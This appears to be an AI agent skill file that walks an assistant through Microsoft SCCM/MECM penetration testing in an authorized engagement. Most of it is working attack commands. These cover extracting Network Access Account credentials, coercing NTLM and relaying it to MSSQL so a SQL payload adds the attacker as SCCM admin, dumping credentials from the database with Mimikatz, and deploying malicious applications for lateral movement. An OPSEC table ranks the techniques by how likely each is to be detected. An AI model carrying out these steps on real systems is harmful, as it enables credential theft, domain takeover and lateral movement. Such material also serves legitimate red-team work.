SCCM/MECM Exploitation

You are helping a penetration tester enumerate and exploit Microsoft
SCCM/MECM infrastructure for credential harvesting, lateral movement,
and domain escalation. All testing is under explicit written authorization.

Engagement Logging

Check for ./engagement/ directory. If absent, proceed without logging.

When an engagement directory exists:

• Print [sccm-exploitation] Activated → <target> to the screen on activation.
• Evidence → save significant output to engagement/evidence/ with
  descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).

Do NOT write to engagement/activity.md, engagement/findings.md, or
engagement state. The orchestrator maintains these files. Report all findings
in your return summary.

State Management

Call get_state_summary() from the state-reader MCP server to read current
engagement state. Use it to:

• Skip re-testing targets, parameters, or vulns already confirmed
• Leverage existing credentials or access for this technique
• Understand what's been tried and failed (check Blocked section)

Do NOT write engagement state. When your work is complete, report all
findings clearly in your return summary. The orchestrator parses your summary
and records state changes. Your return summary must include:

• New targets/hosts discovered (with ports and services)
• New credentials or tokens found
• Access gained or changed (user, privilege level, method)
• Vulnerabilities confirmed (with status and severity)
• Pivot paths identified (what leads where)
• Blocked items (what failed and why, whether retryable)

Prerequisites

Access required: Domain user (for enumeration and NAA extraction via
policy request). Local admin on SCCM client (for WMI/DPAPI extraction).
Domain admin or relay position (for MP relay and database attacks).

Kerberos authentication setup (for enumeration):

getTGT.py 'DOMAIN.LOCAL/username:password' -dc-ip DC_IP
export KRB5CCNAME=$(pwd)/username.ccache

Tools: sccmhunter, SharpSCCM, MalSCCM, ntlmrelayx.py, PetitPotam,
pxethiefy/PXEThief/SharpPXE, CMLoot, Mimikatz, SQLRecon.

Privileged Commands

Claude Code cannot execute sudo commands. The following require root and
must be handed off to the user:

• pxethiefy.py — PXE boot credential harvesting (needs raw sockets for DHCP/TFTP)
• ntlmrelayx.py — NTLM relay to SCCM management point MSSQL (needs raw sockets)

Handoff protocol: Present the full command including sudo, ask the user
to run it, then read the output or wait for callback confirmation.

Non-privileged commands Claude can execute directly:

• Enumeration: sccmhunter, SharpSCCM, CMLoot
• Policy extraction: sccmhunter http, sccmhunter show
• Post-exploitation: SQLRecon, MalSCCM, Mimikatz
• Coercion triggers: PetitPotam.py

Step 1: Enumerate SCCM Infrastructure

Discovery via sccmhunter

# Find SCCM infrastructure in the domain
sccmhunter.py find -u 'user' -p 'Password123' -d DOMAIN.LOCAL -dc-ip DC_IP

# Display discovered site servers
sccmhunter.py show -siteservers

# HTTP-based enumeration (no WMI, broader info)
sccmhunter.py http -u 'user' -p 'Password123' -d DOMAIN.LOCAL -dc-ip DC_IP -auto

SharpSCCM (from compromised Windows host)

# Enumerate devices managed by site server
.\SharpSCCM.exe get devices --server SCCM01 --site-code P01

Unauthenticated MP Endpoints

# Retrieve site signing cert + Unknown Computer GUIDs
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA | xmllint --format -

# List all management points
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?MPLIST | xmllint --format -

# Get site signing certificate
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?SITESIGNCERT | xmllint --format -

These HTTP endpoints are unauthenticated and reveal site structure.

Attack Path Decision Tree

SCCM Infrastructure Found
├── Have local admin on SCCM client? → Step 3 (NAA from WMI/DPAPI — quietest)
├── Can create machine account? → Step 2 (NAA via policy request)
├── Can reach MP + MSSQL? → Step 4 (MP relay to MSSQL)
├── Auto client push enabled? → Step 5 (Client push relay)
├── PXE-enabled DP? → Step 6 (PXE boot credential harvesting)
├── Have SCCM admin or DB access? → Step 7 (Database credential extraction)
└── Have SCCM admin? → Step 8 (Application deployment for lateral movement)

Step 2: NAA Extraction via Policy Request (CRED-2)

Extract Network Access Account credentials by requesting machine policy
from the management point. Requires a machine account (real or created).

Create Machine Account + Request Policy

# 1. Create a machine account (MAQ default allows this)
addcomputer.py -computer-name 'fakesccm$' -computer-pass 'Password123!' \
  'DOMAIN.LOCAL/user:pass' -dc-ip DC_IP

# 2. Add DNS entry for SCCM server (if not resolving)
echo "SCCM_IP  SCCM01 SCCM01.DOMAIN.LOCAL" >> /etc/hosts

# 3. Request policy from MP using fake computer identity (sccmwtf)
python3 sccmwtf.py fake fakepc.domain.local SCCM01 'DOMAIN\fakesccm$' 'Password123!'

# 4. Extract and decrypt NAA credentials from policy XML
cat /tmp/naapolicy.xml | grep 'NetworkAccessUsername\|NetworkAccessPassword' -A 5 \
  | grep 'CDATA' | cut -d '[' -f 3 | cut -d ']' -f 1 \
  | xargs -I {} python3 policysecretunobfuscate.py {}

SharpSCCM Alternative

# From a compromised host (creates new device registration)
.\SharpSCCM.exe get naa -r newdevice -u fakesccm$ -p 'Password123!'
.\SharpSCCM.exe get secrets -u fakesccm$ -p 'Password123!'

Recovered secrets: NetworkAccessUsername, NetworkAccessPassword —
typically a domain account used for SCCM client network access during OSD.

Step 3: NAA Extraction from Running Client (CRED-3 / CRED-4)

Extract NAA credentials from a compromised SCCM client's local WMI store.
Requires local administrator on the SCCM client.

WMI Query + DPAPI Decryption (CRED-3)

# Query NAA from WMI (DPAPI-encrypted blobs)
Get-WmiObject -Namespace "root\ccm\policy\Machine\ActualConfig" -Class "CCM_NetworkAccessAccount"
# Output: NetworkAccessPassword = <![CDATA[E600000001...]]>

# Decrypt with SharpSCCM (automated)
.\SharpSCCM.exe local secrets -m wmi

# Decrypt with SharpDPAPI (manual)
$str = "060...F2DAF"  # Hex from WMI output
$bytes = for($i=0; $i -lt $str.Length; $i++) {
  [byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++
}
$b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
.\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt

WMI Repository Search (CRED-4 — Legacy)

# Search WMI repository file for encrypted secrets
.\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA

# SharpSCCM automated disk search
.\SharpSCCM.exe local secrets -m disk

sccmhunter HTTP Method (Remote)

# Remote NAA extraction via HTTP (if accessible)
sccmhunter.py http -u 'admin' -p 'Password' -d DOMAIN.LOCAL -dc-ip DC_IP -auto

Step 4: Management Point Relay to MSSQL (TAKEOVER-1)

Relay the management point's NTLM authentication to the SCCM database
to gain sysadmin access and extract OSD policy secrets.

Prerequisites: Network access to MP and MSSQL, ability to coerce
MP authentication (PetitPotam/PrinterBug/DFSCoerce).

Start Relay Listener

# SOCKS proxy mode (for interactive SQL follow-on)
ntlmrelayx.py -ts -t mssql://MSSQL_IP -socks -smb2support

# Direct SQL execution — add yourself as SCCM admin
ntlmrelayx.py -smb2support -ts -t mssql://MSSQL_IP -q "USE CM_P01; \
  INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) \
  VALUES (0x<YOUR_SID_HEX>,'DOMAIN\\your_user',0,0,'','','','','P01'); \
  INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
  VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00ALL','29'); \
  INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
  VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00001','1'); \
  INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
  VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00004','1');"

Coerce MP Authentication

# PetitPotam to coerce MP to authenticate to relay listener
python3 PetitPotam.py RELAY_LISTENER_IP MP_IP -u user -p pass -d DOMAIN -dc-ip DC_IP

Extract OSD Secrets via SOCKS Proxy

# Connect to MSSQL through relay SOCKS proxy
proxychains mssqlclient.py -windows-auth 'DOMAIN/MP01$'@MSSQL_IP

-- Get Unknown Computer GUIDs
USE CM_P01;
SELECT SMS_Unique_Identifier0 FROM dbo.UnknownSystem_DISC WHERE DiscArchKey = 2;

-- List policies assigned to Unknown Computer
EXEC MP_GetMachinePolicyAssignments N'<GUID>', N'';

-- Retrieve full policy body
EXEC MP_GetPolicyBody N'{POLICY_ID}', N'2.00';

Decrypt Policy Blob

# Convert hex policy to XML
echo 'fffe3c003f0078...' | xxd -r -p > policy.xml

# Decrypt embedded credential values with PXEthief
python3 pxethief.py 7 $(xmlstarlet sel -t -v "//value/text()" policy.xml)

Recovers: OSDJoinAccount/Password, NetworkAccessUsername/Password, and
other task sequence variable credentials.

sccmhunter Automated MSSQL Path

# Automated SQL execution for RBAC admin + privilege escalation
sccmhunter.py mssql -u user -p pass -d DOMAIN.LOCAL -dc-ip DC_IP \
  -tu your_user -sc P01 -stacked

Step 5: Client Push Account Relay (ELEVATE-2)

If automatic site-wide client push is enabled, trigger the SCCM site
server to authenticate as the client push account and relay it.

# 1. Start relay targeting MSSQL (or SMB/LDAP)
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support

# 2. Trigger client push to your IP
.\SharpSCCM.exe invoke client-push -t ATTACKER_IP

SCCM site server authenticates as the client push installation account
to your IP — relay to MSSQL for sysadmin or to LDAP for RBCD/machine
account creation.

Conditions: Automatic site-wide client push enabled + automatic
device approval + NTLM fallback allowed.

Step 6: PXE Boot Credential Harvesting (CRED-1)

Extract credentials from PXE-enabled Distribution Points.

pxethiefy (Linux)

# Listen for PXE responses and extract boot variables
sudo python3 pxethiefy.py explore -i eth0
# Extracts variables.dat, decrypts or outputs Hashcat hash

SharpPXE (Windows)

# Send PXE boot request, download variables.dat via TFTP
.\SharpPXE.exe
# If password-protected: outputs $sccm$aes128$... for Hashcat

Manual TFTP Download

# TFTP is unauthenticated on PXE-enabled DPs
tftp MP01.domain.local
tftp> get SMSBoot\\x64\\pxe\\variables.dat

# If password-protected: save hash to evidence for cracking
# Hash format: $sccm$aes128$... (hashcat mode 31100)
cp hash.txt engagement/evidence/sccm-pxe-hash.txt

Do NOT crack hashes in this skill. Save the PXE hash to
engagement/evidence/ and return to the orchestrator with the hash file path,
hash type (SCCM PXE / hashcat mode 31100), and a routing recommendation to
credential-cracking.

Recovered: Management Point URL, site code, media GUIDs, potentially
task sequence credentials.

Step 7: Database Credential Extraction (CRED-5)

Extract all encrypted credentials from the SCCM database's SC_UserAccount
table. Requires sysadmin access to the database (via relay or direct).

Mimikatz (Direct SCCM Decryption)

# Queries SC_UserAccount + decrypts all credentials
mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=CM_P01;SERVER=MSSQL01;"

SQLRecon

# On site server where DB is local
.\SQLRecon.exe /auth:WinToken /host:MSSQL01 /database:CM_P01 /module:sDecryptCredentials

# Manual extraction
.\SQLRecon.exe /auth:WinToken /host:MSSQL01 /database:CM_P01 /module:query /command:"SELECT * FROM SC_UserAccount"

Manual Decryption

# Decrypt extracted values with xpn's PoC
sccmdecryptpoc.exe 0C010000080...5D6F0

Step 8: Application Deployment for Lateral Movement

Deploy malicious applications to device collections for code execution
on target machines. Requires SCCM admin access.

MalSCCM (Full Chain)

# 1. Enumerate targets
MalSCCM.exe locate
MalSCCM.exe inspect /computers

# 2. Create device collection
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device

# 3. Add target hosts
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET01

# 4. Create application (UNC path to payload on SCCMContentLib$)
MalSCCM.exe app /create /name:update /uncpath:"\\\\SCCM01\\SCCMContentLib$\\payload.exe"

# 5. Deploy to group
MalSCCM.exe app /deploy /name:update /groupname:TargetGroup /assignmentname:deploy01

# 6. Force immediate checkin
MalSCCM.exe checkin /groupname:TargetGroup

# 7. Cleanup
MalSCCM.exe app /cleanup /name:update
MalSCCM.exe group /delete /groupname:TargetGroup

SharpSCCM (Simpler Execution)

# Direct command execution on device
.\SharpSCCM.exe exec -d TARGET01 -p "C:\Windows\System32\cmd.exe /c whoami > C:\temp\out.txt" -s

SCCM Share Looting (CMLoot)

# Inventory all files on SCCM shares
Invoke-CMLootInventory -SCCMHost SCCM01.domain.local -Outfile sccmfiles.txt

# Download interesting files
Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi
Invoke-CMLootDownload -SingleFile '\\SCCM01\SCCMContentLib$\DataLib\SC100001.1\x86\config.xml'

SCCMContentLib$ is world-readable and may contain application binaries,
task sequence XML with embedded credentials, and configuration files.

Step 9: Escalate or Pivot

After SCCM exploitation:

• NAA credentials obtained: Route to pass-the-hash for lateral
  movement using NAA account
• Task sequence credentials (OSDJoinAccount): Route to
  pass-the-hash or password-spraying (password reuse)
• SCCM admin achieved: Use application deployment (Step 8) to reach
  high-value targets, then route to credential-dumping
• Client push account relayed: Route to credential-dumping if
  DA-level access achieved
• Domain admin via SCCM: Route to ad-persistence for maintaining
  access

Update engagement/state.md with:

• SCCM infrastructure details (site server, MP, DP, site code)
• Extracted credentials (NAA, task sequence, client push)
• SCCM admin access level

Stall Detection

If you have spent 5 or more tool-calling rounds on the same failure with
no meaningful progress — same error, no new information, no change in output
— stop.

What counts as progress:

• Trying a variant or alternative documented in this skill
• Adjusting syntax, flags, or parameters per the Troubleshooting section
• Gaining new diagnostic information (different error, partial success)

What does NOT count as progress:

• Writing custom exploit code not provided in this skill
• Inventing workarounds using techniques from other domains
• Retrying the same command with trivially different input
• Compiling or transferring tools not mentioned in this skill

If you find yourself writing code that isn't in this skill, you have left
methodology. That is a stall.

Do not loop. Work through failures systematically:

1. Try each variant or alternative once
2. Check the Troubleshooting section for known fixes
3. If nothing works after 5 rounds, you are stalled

When stalled, return to the orchestrator immediately with:

• What was attempted (commands, variants, alternatives tried)
• What failed and why (error messages, empty responses, timeouts)
• Assessment: blocked (permanent — config, patched, missing prereq) or
  retry-later (may work with different context, creds, or access)

When stalled: Tell the user you're stalled, present what was tried, and
recommend the next best path. Return findings to the orchestrator — it will
decide whether to revisit with new context or route elsewhere.

Troubleshooting

sccmhunter find Returns Nothing

• Verify LDAP connectivity: nxc ldap DC_IP -u user -p pass
• SCCM objects may be in a different naming context — try manual LDAP
  search for mSSMSSite objectClass
• Site server may not be registered in AD (standalone) — scan network
  for port 80/443 on servers and check /SMS_MP/ endpoint

Policy Request Fails (NAA Extraction)

• Management point may require PKI client certificate — check MP
  configuration for "HTTPS only" mode
• Machine account may not be registered — use SharpSCCM to register
  a new device identity
• DNS must resolve the MP hostname — add /etc/hosts entry

Relay to MSSQL Fails

• SMB signing may be required on MSSQL host — check with
  nxc smb MSSQL_IP for signing status
• MSSQL may not accept relay — Extended Protection for Authentication
  (EPA) blocks relay on modern SQL Server
• Verify MP is sysadmin on DB — try SOCKS proxy after relay to confirm

PXE Boot Extraction Fails

• PXE must be enabled on Distribution Point — check registry
  HKLM\Software\Microsoft\SMS\DP\PxeInstalled
• Need network reachability on UDP 4011 (DHCP proxy) and UDP 69 (TFTP)
• If password-protected: extract hash and route to credential-cracking (mode 31100)

Application Deployment Not Executing

• Default GPUpdate interval is 90 minutes — use MalSCCM.exe checkin
  or gpupdate /force on target
• Verify device is in the collection: MalSCCM.exe inspect /groups
• Check SCCM client logs on target: C:\Windows\CCM\Logs\

KRB_AP_ERR_SKEW (Clock Skew)

Kerberos requires clocks within 5 minutes of the DC. This is a Clock Skew
Interrupt — stop immediately and return to the orchestrator. Do not retry or
fall back to NTLM. The fix requires root:

sudo ntpdate DC_IP
# or
sudo rdate -n DC_IP

OPSEC Comparison

Technique	OPSEC	Detection	Prerequisites
SCCM enumeration (sccmhunter find)	Low-Medium	LDAP queries	Domain user
MP HTTP endpoint queries	Low	IIS logs	Network access
NAA from WMI (CRED-3)	Low	Local execution	Local admin on client
NAA from WMI repository (CRED-4)	Low	File access	Local admin on client
NAA via policy request (CRED-2)	Medium-High	Machine account creation + MP logs	Domain user
SCCM share looting (CMLoot)	Low	SMB access logs	Domain user
PXE boot harvesting (CRED-1)	Medium	DHCP/TFTP logs on DP	Network access
MP relay to MSSQL (TAKEOVER-1)	High	Coercion + relay + SQL audit	Network position
Client push relay (ELEVATE-2)	High	Server logs + auth events	Client push enabled
Database extraction (CRED-5)	High	SQL audit logs	DB sysadmin
Application deployment	High	Extensive SCCM + client logs	SCCM admin